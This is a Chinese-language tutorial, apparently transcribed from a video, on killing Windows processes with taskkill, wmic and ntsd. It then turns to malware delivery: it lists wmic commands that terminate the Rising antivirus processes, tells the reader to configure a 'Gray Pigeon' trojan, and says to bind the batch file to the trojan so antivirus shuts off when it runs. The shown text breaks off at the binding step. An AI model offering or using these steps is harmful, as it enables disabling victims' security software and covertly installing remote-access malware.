|
1����、用taskill命令
①taskkill /im 進程名稱
示例:用taskkill /im VStart.exe命令關閉音速啟動,VStart.exe就是音速啟動的進程名稱,下面看操作,執(zhí)行了三次,成功關閉了音速啟動,再看下面的方法.
②taskkill /pid[進程碼] -t(結(jié)束該進程) -f(強制結(jié)束該進程以及所有子進程)
注:有兩種方法查進程的PID碼:
①在命令行下用
tasklist 命令查出進程的PID號碼,就是這些
②在任務管理器中的查看選項中選擇選擇列中勾先PID那一項
示例:舉個關閉迅雷的例子,先找出迅雷的PID碼2552 taskkill /pid 2552 -f,就是這個指令,下面來運行一下看看.
2、用 wmic process where name="進程名稱" call terminate 這個不需要知道進程的PID號
示例: wmic process where
name="iexplore.exe" call terminate 關閉IE瀏覽器,我們來運行一下這條指令看看.看到了吧瀏覽器已經(jīng)關閉了,再看下面的.
3�、ntsd -c q -p [pid進程碼]
示例:還是舉個關閉迅雷的吧,同樣先找出迅雷的PID碼2724
ntsd -c q -p 2724 是這條指令,下面我們來執(zhí)行一下看看.看到了吧,迅雷已經(jīng)關閉了.
這樣關進程有什么作用呢?
一方面遇到不能用任務管理器結(jié)束的進程可以試試上面的方法,而且用wmic process where name="進程名稱" call terminate和taskkill /im 進程名稱這兩條可以同時關閉多個進程名相同的進程,舉個關2個QQ的例子吧,已經(jīng)打開了兩個QQ程序,wmic process where
name="QQ.exe" call terminate,我們來執(zhí)行一下看看,看到了吧,兩個QQ都關閉了.
另一方面我們利用上面的命令可以做個關殺毒軟件的批處理,然后把批處理文件和木馬捆綁在一起,這樣運行木馬的時候就關閉了殺毒軟件,下面看我操作
1����、先建立一個關閉殺毒軟件進程的批處理文件,這里我以關閉瑞星為例,說明一下我的瑞星已
經(jīng)關閉了監(jiān)控系統(tǒng),所以這些就不用了:
wmic process where name="RavTask.exe" call terminate
wmic process where name="CCenter.exe" call terminate
wmic process where name="RavmonD.exe" call terminate
wmic process where name="Ravmon.exe" call terminate
wmic process where name="RavStub.exe" call terminate
2��、配置一個木馬,配個鴿子吧
3�����、用文件捆綁器將批處理文件和木馬捆綁到一起,這里我隨便找個文件捆綁器,不是免殺的
|
